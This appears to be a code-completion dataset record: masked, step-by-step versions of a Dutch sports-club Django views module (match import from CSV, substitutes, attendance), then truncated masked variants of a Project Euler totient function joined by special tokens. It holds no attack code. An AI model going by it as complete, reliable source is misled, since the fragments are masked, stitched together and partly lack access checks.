"step-2": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' 
and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = 
Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\n<mask token>\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-3": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' 
and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = 
Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld als mogelijke invaller. 
Goed bezig!!')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-4": "<mask token>\nSITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))\neu = pytz.utc\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' 
and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n 
m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\ndef importMatch(request):\n matches = Match.objects.exclude(date__lte=date.today()).order_by('date')\n if request.method == 'POST':\n form = importMatchesForm(request.POST, request.FILES)\n if form.is_valid():\n savedmatches, fail = readMatch(request.FILES['matches'])\n return render(request, 'savematch_success.html', {\n 'savedmatches': savedmatches, 'fail': fail})\n else:\n form = importMatchesForm()\n return render(request, 'savematch.html', {'form': form, 'matches': matches}\n )\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld als mogelijke invaller. 
Goed bezig!!')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-5": "from unidecode import unidecode\nimport pdb\nimport os, manage\nimport re\nfrom datetime import *\nimport codecs\nimport csv\nimport smtplib\n\nfrom django.core.urlresolvers import reverse \nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, render\nfrom django.contrib.auth.models import User\nfrom django.template import RequestContext\nfrom django.utils import simplejson\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib import messages\n\nfrom pytz import timezone\nimport pytz\nfrom mailsnake import *\n\nfrom .feeds import EventFeed\nimport mijnhercules.settings as settings\nfrom .models import Match, Location\nfrom .forms import MatchPresence\nfrom members.models import Team, Player, MembershipHercules, Pass\n# from mijnhercules.forms import *\nfrom members.forms import EditPlayerForm, ArrangeSubstitutesForm, importMatchesForm, importPlayersForm\n\nSITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))\n\neu = pytz.utc\n\n#count amount of teams\n# @login_required\n# def TeamCount():\n# t = Team.objects.all()\n# return len(t)\n\ndef createMatchFeed(request, teamwedstrijd = None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request) \n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n # raise ValueError\n return render(request, 
'viewmatch.html', {'match':m, 'hercules':teams, 'substitutes':substitutes, 'substituteoptions':substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n \n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # m.substitutesneeded = cd['substitutesneeded']\n m.setSubstitutes(team = teampk, amountsubsneeded = cd['substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n else:\n if m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match':m, 'form': form, 'substitutes':substituteWilling, 'presentplayers':presentplayers})\n\n else:\n raise Http404\n\ndef readMatch(f):\n # with open(f, 'rU') as csvfile:\n # data = csv.reader(csvfile, delimiter=';', dialect=csv.excel_tab)\n # data.next()\n # data = f.read()\n # data = data.splitlines()\n # dialect = csv.Sniffer().sniff(codecs.EncodedFile(f,\"utf-8\").read(1024))\n \n f.open() \n # check whether headers are indicative of a good csv file:\n reader = csv.reader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and \\\n 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next()\n except:\n # 
mail_admins(\"Foute wedstrijd upload\", \"Probleem met CSV upload\", fail_silently=False)\n return [], \"Foutje: het lijkt geen csv bestand te zijn.\"\n f.close()\n\n # get min and max daterange so cancelled matches can be deleted later on:\n f.open() \n data = csv.DictReader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte=mindate)\n f.close()\n\n # start saving matches\n savedmatches = []\n f.open() \n data = csv.DictReader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n for row in data:\n if \"Zaal\" in row['Aanduiding']:\n # add locations if not yet existent in the db\n try:\n loca = re.match(r'(.*)\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n #print \"Existing\", loc\n except:\n loc = re.match(r'(.*)\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n #add team if not yet existent in the db\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number = row['Thuis team'], level = '99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number = row['Uit team'], level = '99')\n t2.save()\n \n # get datetime field:\n try:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))\n\n 
#get matches:\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n #print m\n # saveMatch(m, row[1] + row[2], t1, t2, loc)\n except:\n #print \"except match with %s and %s\" % (t1, t2)\n m = Match(\n nrid=row['Wedstrijdnummer'], \n date = date,\n teamhome = t1,\n teamaway = t2,\n location = loc)\n m.save()\n savedmatches.append(m)\n\n # delete cancelled matches:\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n\n return savedmatches, None\n\ndef importMatch(request):\n matches = Match.objects.exclude(date__lte=date.today()).order_by('date')\n if request.method == 'POST':\n form = importMatchesForm(request.POST, request.FILES)\n if form.is_valid():\n savedmatches, fail = readMatch(request.FILES['matches'])\n # request.FILES['matches'].open(\"rb\")\n # portfolio = csv.DictReader(request.FILES['uploadFile'].file)\n return render(request, 'savematch_success.html', {'savedmatches':savedmatches, 'fail': fail})\n else:\n form = importMatchesForm()\n return render(request, 'savematch.html', {'form': form, 'matches': matches})\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial = status)\n # raise ValueError\n return render(request, 'mymatches.html', {'mymatches': matches, 'presentmatches':presentmatches})\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk = teampk, player = Player.objects.get(pk=substitutepk))\n messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld als mogelijke invaller. 
Goed bezig!!')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(viewMatch, args=(matchpk,))) \n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player =Player.objects.get(pk=substitutepk))\n # return render(request, 'substitutewilling_cancellation.html')\n messages.add_message(request, messages.SUCCESS, 'Je afmelding als mogelijke invaller is doorgegeven.')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(viewMatch, args=(matchpk,))) \n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk = teampk, player = Player.objects.get(pk=playerpk))\n messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(editMatch, args=(matchpk,))) \n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player =Player.objects.get(pk=playerpk))\n # return render(request, 'substitutewilling_cancellation.html')\n messages.add_message(request, messages.SUCCESS, 'Je afmelding voor deze wedstrijd is doorgegeven.')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(editMatch, args=(matchpk,))) ",
"step-ids": [
6,
8,
9,
11,
13
]
}
|
[
6,
8,
9,
11,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def phi(n):
    """Return Euler's totient of n: the count of integers in 1..n coprime to n."""
    r = n
    d = 2
    p = n
    # Trial division: only divisors up to sqrt(r) need to be tried.
    while d * d <= r:
        if r % d == 0:
            # Fix: scale the running count (p -= p // d), not the residue.
            # The original `p -= int(r / d)` gives e.g. phi(12) == 5 instead of 4.
            p -= p // d
            while r % d == 0:
                r //= d
        d += 1
    if r > 1:
        # Whatever remains is a single prime factor larger than sqrt(n)
        p -= p // r
    return p
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def phi(n):
    """Euler's totient: how many integers in 1..n share no factor with n.

    Implemented via trial division; for each distinct prime factor d the
    count is multiplied by (1 - 1/d), done incrementally as p -= p // d.
    """
    r = n
    d = 2
    p = n
    while d * d <= r:
        if r % d == 0:
            # Bug fix: the original subtracted r // d (the shrinking residue),
            # which over-counts for numbers with several prime factors.
            p -= p // d
            while r % d == 0:
                r //= d
        d += 1
    if r > 1:
        # Remaining residue is itself prime (it exceeded sqrt of the input)
        p -= p // r
    return p
<|reserved_special_token_0|>
# Project Euler 69: track the best (n / phi(n), n) pair for n < 1,000,000.
# Fix: `m` was used before assignment, causing a NameError on the first iteration.
m = (0, 1)
for n in range(2, 1000000):
    p = phi(n)
    m = max(m, (n / p, n))
    if n % 10000 == 0:
        print(n)  # progress indicator for the long-running search
print(m)
<|reserved_special_token_1|>
def phi(n):
    """Return Euler's totient of n (count of 1..n coprime to n).

    Uses trial division up to sqrt(n); for each distinct prime factor d
    the count is reduced by its multiples: p -= p // d.
    """
    r = n
    d = 2
    p = n
    while d * d <= r:
        if r % d == 0:
            # Bug fix: subtract p // d, not r // d — the original produced
            # phi(12) == 5 rather than the correct 4.
            p -= p // d
            while r % d == 0:
                r //= d
        d += 1
    if r > 1:
        # Leftover r is a prime factor greater than sqrt(n)
        p -= p // r
    return p


if __name__ == '__main__':
    # Project Euler 69: find n < 1,000,000 maximizing n / phi(n).
    # Guarded so importing this module does not launch the full search.
    m = 0, 1
    for n in range(2, 1000000):
        p = phi(n)
        m = max(m, (n / p, n))
        if n % 10000 == 0:
            print(n)  # progress indicator
    print(m)
<|reserved_special_token_1|>
def phi(n):
    """Euler's totient of n: |{k in 1..n : gcd(k, n) == 1}|."""
    r = n
    d = 2
    p = n
    # Only candidate divisors up to sqrt(r) are needed; the remainder,
    # if greater than 1, is a prime factor in its own right.
    while d * d <= r:
        if r % d == 0:
